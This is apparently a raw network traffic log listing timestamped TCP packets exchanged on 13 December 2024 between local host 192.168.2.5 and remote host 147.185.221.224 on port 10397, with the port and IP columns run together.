                                          Dec 13, 2024 12:34:20.763746023 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:20.764019966 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:20.884104967 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:20.884332895 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:21.004582882 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:21.004746914 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:21.126503944 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:21.126607895 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:21.246815920 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:21.247103930 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:21.367165089 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:21.367480993 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:21.487577915 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:21.487725973 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:21.608299017 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:21.608395100 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:21.728431940 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:21.728528976 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:21.848516941 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:21.848750114 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:22.184663057 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:22.210783958 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:22.210867882 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:22.304670095 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:22.304771900 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:22.330838919 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:22.425324917 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:22.425400019 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:22.545290947 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:22.548259974 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:22.669734955 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:22.672245026 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:22.792124987 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:22.792536974 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:22.913331032 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:22.913429976 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:23.034238100 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:23.034341097 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:23.154433012 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:23.154542923 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:23.275232077 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:23.280380964 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:23.402385950 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:23.403980970 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:23.523874044 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:23.523957014 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:23.644248009 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:23.644494057 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:23.768239975 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:23.768302917 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:23.888247967 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:23.888498068 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.008296967 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.008382082 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.128675938 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.128768921 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.248925924 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.249032021 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.368987083 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.369060993 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.489104986 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.489186049 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.609023094 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.612272024 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.732112885 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.732186079 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.851989031 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.852188110 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:24.972171068 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:24.972449064 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:25.092363119 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:25.092664957 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:25.212714911 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:25.212810040 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:25.332890034 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:25.332988977 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:25.455503941 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:25.455574036 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:25.575695992 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:25.575902939 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:25.697185993 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:25.697357893 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:25.817332983 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:25.817420959 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:25.938574076 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:25.938647032 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:26.293834925 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:26.432358980 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:26.432379007 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:26.432729959 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:26.552644968 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:26.552737951 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:26.674170971 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:26.674261093 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:26.794157028 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:26.794234037 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:26.915529013 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:26.915659904 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.035676956 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.035825968 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.155711889 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.155783892 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.276293039 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.276372910 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.396229029 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.396301031 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.516175985 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.516252995 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.636213064 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.637950897 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.757894039 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.758228064 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.878088951 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.879200935 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:27.998881102 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:27.999288082 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:28.119786978 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:28.121992111 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:28.242536068 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:28.242641926 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:28.363198996 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:28.364398956 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:28.484493971 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:29.053117990 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:29.173089981 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:29.173141003 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:29.292949915 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:29.293010950 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:29.412858009 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:29.412933111 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:29.532896042 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:29.533113003 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:29.653012991 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:29.653098106 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:29.775135040 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:29.775271893 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:29.895216942 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:29.895323992 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.015162945 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.015275955 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.135181904 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.135441065 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.255554914 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.255677938 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.375631094 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.375700951 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.495724916 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.495795965 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.616305113 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.620389938 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.740607977 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.744401932 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.866835117 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.868371964 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:30.989938974 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:30.990039110 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:31.153500080 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:31.154149055 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:31.357544899 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:31.360392094 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:31.609543085 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:31.609829903 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:31.857618093 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:31.857671022 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:32.109746933 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:32.109839916 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:32.357464075 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:32.357764959 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:32.609478951 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:32.611323118 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:32.857637882 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:32.860434055 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:33.105653048 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:33.106040001 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:33.353550911 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:33.355309963 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:33.601893902 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:33.602161884 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:33.851366043 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:33.851461887 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:34.097661018 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:34.097919941 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:34.345647097 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:34.345819950 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:34.593674898 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:34.593885899 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:34.841610909 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:34.841794014 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:35.089562893 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:35.089643955 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:35.337845087 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:35.338133097 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:35.589514971 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:35.589615107 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:35.837526083 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:35.837629080 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:36.085640907 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:36.085933924 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:36.333504915 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:36.333576918 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:36.581566095 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:36.705475092 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:36.825402021 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:36.826396942 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:36.946233988 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:36.948151112 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:37.068110943 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:37.070580006 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:37.190864086 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:37.191262007 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:37.311124086 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:37.316272020 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:37.436234951 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:37.438663006 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:37.558746099 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:37.558840036 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:37.678883076 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:37.679148912 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:37.799134970 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:37.799345016 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:37.919858932 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:37.919944048 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:38.039886951 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:38.040147066 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:38.160160065 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:38.160244942 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:38.280122042 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:38.280205965 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:38.400237083 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:38.400477886 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:38.520438910 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:38.520673990 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:38.640711069 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:38.640844107 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:38.802105904 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:38.802241087 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:39.009491920 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:39.009613991 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:39.261918068 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:39.262013912 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:39.513433933 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:39.513503075 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:39.761596918 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:39.761642933 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:40.009457111 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:40.009553909 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:40.253437042 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:40.253694057 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:40.501569986 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:40.501811981 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:40.749536037 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:40.752326012 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:40.997471094 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:40.997594118 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:41.245429993 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:41.245536089 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:41.493446112 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:41.494486094 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:41.741482019 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:41.741565943 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:41.993443012 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:41.993592978 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:42.245589972 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:42.245683908 CET4998210397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:42.394850016 CET1039749982147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:44.421545982 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:44.541601896 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:44.541810036 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:44.546142101 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:44.666126013 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:44.666389942 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:44.786356926 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:44.786708117 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:44.906608105 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:44.906743050 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:45.026582956 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:45.026844978 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:45.146658897 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:45.146936893 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:45.266778946 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:45.305350065 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:45.425225973 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:45.425533056 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:45.545391083 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:45.545999050 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:45.665844917 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:45.666086912 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:45.786050081 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:45.786211014 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:45.906425953 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:45.906711102 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.026521921 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.026782036 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.146572113 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.146764994 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.266623974 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.266980886 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.386980057 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.387341022 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.507189989 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.507354975 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.627197981 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.627911091 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.747876883 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.748272896 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.868845940 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.873152971 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:46.993187904 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:46.996367931 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:47.116277933 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:47.120368004 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:47.240242004 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:47.244285107 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:47.364537954 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:47.366579056 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:47.486505985 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:47.488248110 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:47.608123064 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:47.609925032 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:47.729959965 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:47.730061054 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:47.849982977 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:47.852314949 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:47.972227097 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:48.003813982 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:48.124429941 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:48.223165035 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:48.343189001 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:48.366919994 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:48.486968040 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:48.487353086 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:48.607230902 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:48.608455896 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:48.728265047 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:48.731479883 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:48.851331949 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:48.855336905 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:48.975272894 CET1039749983147.185.221.224192.168.2.5
                                          Dec 13, 2024 12:34:48.980351925 CET4998310397192.168.2.5147.185.221.224
                                          Dec 13, 2024 12:34:49.100317001 CET1039749983147.185.221.224192.168.2.5
